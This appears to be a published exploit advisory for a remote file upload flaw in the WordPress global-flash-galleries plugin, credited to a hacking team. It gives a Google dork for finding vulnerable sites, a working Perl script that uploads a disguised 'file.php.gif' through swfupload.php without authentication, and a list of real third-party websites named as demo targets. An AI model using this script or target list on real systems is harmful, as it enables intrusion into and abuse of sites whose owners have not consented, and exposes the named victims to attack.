############################################################### # Exploit Title: WordPress global-flash-galleries Plugin Remote File Upload Vulnerability # Author: Ashiyane Digital Security Team # Date: 01/18/2014 # Vendor Homepage: http://wordpress.org # Software Link : http://downloads.wordpress.org/plugin/global-flash-galleries.zip # Google dork: inurl:/wp-content/plugins/global-flash-galleries/ # Tested on: Windows/Linux ############################################################### # Description : Global-Flash Galleris allows file upload to unauthenticated users. Filters in place only permits uploads of image files (extensions .gif, .png and .jpg). This avoids scripts execution problems but an attacker could use the affected system to Host files. Vulnerability occurs due an innapropiate cookie validation in : /global-flash-galleries/swfupload.php # Exploit : = = = = = = = = = [Perl] #! /usr/bin/perl use LWP; use HTTP::Request::Common; my ($url, $file) = @ARGV; my $ua = LWP::UserAgent->new(); my $req = POST $url, Content_Type => 'form-data', Content => [ name => $name, galleryselect => 1, # Gallery ID (popup.php) Filedata => [ "$file", "file.php.gif", Content_Type => 'image/gif' ] ]; my $res = $ua->request( $req ); if( $res->is_success ) { print $res->content; } else { print $res->status_line, "\n"; } [Perl] # Exploit demo : = = = = = = = = = http://radiostan.fm/wp-content/plugins/global-flash-galleries/swfupload.php http://izhairstudio.ca/wp-content/plugins/global-flash-galleries/swfupload.php http://awb.usahidsolo.ac.id/wp-content/plugins/global-flash-galleries/swfupload.php http://minigolfcourseulles.fr/wp-content/plugins/global-flash-galleries//swfupload.php http://madiro-hotel.com/wp-content/plugins/global-flash-galleries/swfupload.php # #### #### #### #### #### #### #### #### # # BY T3rm!nat0r5 # Special Tnx to V1R4N64R ,C4T,HAMIDx9 # E-mail : poya.terminator@gmail.com # #### #### #### #### #### #### #### #### #